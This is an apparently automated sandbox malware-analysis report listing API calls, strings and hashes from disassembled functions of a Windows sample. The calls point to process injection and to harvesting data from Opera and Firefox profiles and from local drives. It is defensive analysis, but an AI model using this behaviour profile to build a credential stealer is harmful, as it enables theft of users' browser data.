Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Process$MemoryThread$Write$AllocContextResumeVirtual$CreateRead_memset
String ID: C:\Windows\System32\cmd.exe$a-
API String ID: 3621800378-1638984567
Opcode ID: b80c1f520e6bbf614baa44d4925fc976767e91f49b05bf204f4c6d7d44999050
Instruction ID: 8095cd50dec5f742c029ed30cbada7958bf217cecb1dedabdb79fca3dc9160da
Opcode Fuzzy Hash: b80c1f520e6bbf614baa44d4925fc976767e91f49b05bf204f4c6d7d44999050
Instruction Fuzzy Hash: 07414872A00209AFEB10AFA4DC85FEAB7B9FF48705F104465FA41EA161E775AD508B21

Function 00081D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

FindFirstFileA.KERNEL32(?,?,000BA9AC,000BA9B0,000B69FA,000B69F7,00097908,?,00000000), ref: 00081FA4
StrCmpCA.SHLWAPI(?,000BA9B4), ref: 00081FD7
StrCmpCA.SHLWAPI(?,000BA9B8), ref: 00081FF1
FindFirstFileA.KERNEL32(?,?,000BA9BC,000BA9C0,?,000BA9C4,000B69FB), ref: 000820DD
CopyFileA.KERNEL32(?,?,00000001), ref: 000822C3

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

DeleteFileA.KERNEL32(?), ref: 00082336
FindNextFileA.KERNEL32(?,?), ref: 000823A2
FindClose.KERNEL32(?), ref: 000823B6
CopyFileA.KERNEL32(?,?,00000001), ref: 000825DC

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

DeleteFileA.KERNEL32(?), ref: 0008264F

Part of subcall function 00096E97: Sleep.KERNEL32(000003E8,?,?), ref: 00096EFE

FindNextFileA.KERNEL32(?,?), ref: 000826C6
FindClose.KERNEL32(?), ref: 000826DA

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Strings

\*.*, xrefs: 00081E9E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: 97be7001561d0527d13f73c34bcb2097346ced98c06d2ea0b0f6ee4178171074
Instruction ID: af7cedec0de3f55ef6fd70f0305d1b3aa710925695b5071b54c217c2eb22bda0
Opcode Fuzzy Hash: 97be7001561d0527d13f73c34bcb2097346ced98c06d2ea0b0f6ee4178171074
Instruction Fuzzy Hash: 87329431A412299FCF61FB24DC46ACDB3B8BF45304F4141E1A598B7162DB70AF8A9F91

Function 0009543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0009546A
FindFirstFileA.KERNEL32(?,?), ref: 00095481
StrCmpCA.SHLWAPI(?,000B6A80), ref: 000954A2
StrCmpCA.SHLWAPI(?,000B6A84), ref: 000954BC
lstrcatA.KERNEL32(?), ref: 0009550D
lstrcatA.KERNEL32(?), ref: 00095520
lstrcatA.KERNEL32(?,?), ref: 00095534
lstrcatA.KERNEL32(?,?), ref: 00095547
lstrcatA.KERNEL32(?,000B6A88), ref: 00095559
lstrcatA.KERNEL32(?,?), ref: 0009556D

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

FindNextFileA.KERNEL32(?,?), ref: 00095623
FindClose.KERNEL32(?), ref: 00095637

Strings

%s\%s, xrefs: 0009545E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 6777ed2866c8d99d2995a33f892c4a6bfbba85bc709ef3b029f068ae89469f64
Instruction ID: 1f3bf9934fecebd799a50a2389cff895003a1d856f767722230fc7551be33498
Opcode Fuzzy Hash: 6777ed2866c8d99d2995a33f892c4a6bfbba85bc709ef3b029f068ae89469f64
Instruction Fuzzy Hash: 8D512CB1D0021C9BCF60EB60DC89AD9B7BCAB08305F4045E6A608E3251EB319F89CF65

Function 0008BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindFirstFileA.KERNEL32(?,?,\*.*,000B682E,0008CC6B,?,?), ref: 0008BFC5
StrCmpCA.SHLWAPI(?,000B7470), ref: 0008BFE5
StrCmpCA.SHLWAPI(?,000B7474), ref: 0008BFFF
StrCmpCA.SHLWAPI(?,Opera,000B6843,000B6842,000B6837,000B6836,000B6833,000B6832,000B682F), ref: 0008C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0008C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0008C0A7

Strings

Opera GX, xrefs: 0008C091
\*.*, xrefs: 0008BF73
Opera Crypto, xrefs: 0008C09F
Opera, xrefs: 0008C083

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 9885e983e98e7e076a5ef9144c50b3c07335b1abbb297906a761e7fe11056366
Instruction ID: 445167b32a9ef117e3b13aa9b34e699386951c573e583c32586b1167e525afa4
Opcode Fuzzy Hash: 9885e983e98e7e076a5ef9144c50b3c07335b1abbb297906a761e7fe11056366
Instruction Fuzzy Hash: 7802C0369412299FDF61FB24DD46ADDB7B4BF40300F4141E1E998B7162DB30AE8A9F90

Function 00095142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 000951C2
_memset.LIBCMT ref: 000951E5
GetDriveTypeA.KERNEL32(?), ref: 000951EE
lstrcpyA.KERNEL32(?,?), ref: 0009520E
lstrcpyA.KERNEL32(?,?), ref: 00095229

Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094D1C
Part of subcall function 00094CC8: FindFirstFileA.KERNEL32(?,?), ref: 00094D33
Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094D4F
Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094D60
Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B69F8), ref: 00094D81
Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B69FC), ref: 00094D9B
Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094DC2
Part of subcall function 00094CC8: StrCmpCA.SHLWAPI(?,000B660F), ref: 00094DD6
Part of subcall function 00094CC8: wsprintfA.USER32 ref: 00094DFF
Part of subcall function 00094CC8: _memset.LIBCMT ref: 00094E28
Part of subcall function 00094CC8: lstrcatA.KERNEL32(?,?), ref: 00094E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0009524A
lstrlenA.KERNEL32(?), ref: 000952C4

Strings

*%DRIVE_FIXED%*, xrefs: 0009515E
%DRIVE_REMOVABLE%, xrefs: 00095215
*%DRIVE_REMOVABLE%*, xrefs: 0009518F
%DRIVE_FIXED%, xrefs: 00095230

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: ef4712593b3c0b7893bf5e29b3a273b9fd04f87b3e175aff2525b6b7816ea85c
Instruction ID: 2ce73915ebe5ac77f929f743006d81168c73373098e51a3742ff7ddd3e630518
Opcode Fuzzy Hash: ef4712593b3c0b7893bf5e29b3a273b9fd04f87b3e175aff2525b6b7816ea85c
Instruction Fuzzy Hash: F4512BB190021CAFDF719F61DC85BDEBBB9FB05301F004195EA48A6112EB319E49DF55

Function 0008CD37 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0008CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0008CD73
StrCmpCA.SHLWAPI(?,000B74EC), ref: 0008CD94
StrCmpCA.SHLWAPI(?,000B74F0), ref: 0008CDAE

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

lstrlenA.KERNEL32(0008D3B5,000B6872,000B74F4,?,000B686F), ref: 0008CE41
DeleteFileA.KERNEL32(?,000B750C,000B6873,?,000B7508,000B7504,000B7500,000B74FC), ref: 0008D122
CopyFileA.KERNEL32(?,?,00000001), ref: 0008D136

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

FindNextFileA.KERNEL32(?,?), ref: 0008D23C
FindClose.KERNEL32(?), ref: 0008D250

Strings

%s\*.*, xrefs: 0008CD56

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 3967855609-1013718255
Opcode ID: fb4d4a9be4b78307fa874a62f4ca31192565e083f98b2c7e423c48c137e59710
Instruction ID: 76672085d22d057c85ddd3ed6c62135072767544f6df6ec3c8d83642777e2141
Opcode Fuzzy Hash: fb4d4a9be4b78307fa874a62f4ca31192565e083f98b2c7e423c48c137e59710
Instruction Fuzzy Hash: 44D1A5329021299FEF61FB24DD46ADDB7B4AF44304F4140E1E958B7163DB30AE8A9F91

Function 0008D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

FindFirstFileA.KERNEL32(?,?,000B7570,000B68A3,?,?,?), ref: 0008D647
StrCmpCA.SHLWAPI(?,000B7574), ref: 0008D668
StrCmpCA.SHLWAPI(?,000B7578), ref: 0008D682
StrCmpCA.SHLWAPI(?,prefs.js,000B757C,?,000B68AE), ref: 0008D70E

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

CopyFileA.KERNEL32(?,?,00000001), ref: 0008D7E8
DeleteFileA.KERNEL32(?), ref: 0008D8B3
FindNextFileA.KERNEL32(?,?), ref: 0008D956
FindClose.KERNEL32(?), ref: 0008D96A

Strings

prefs.js, xrefs: 0008D702

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
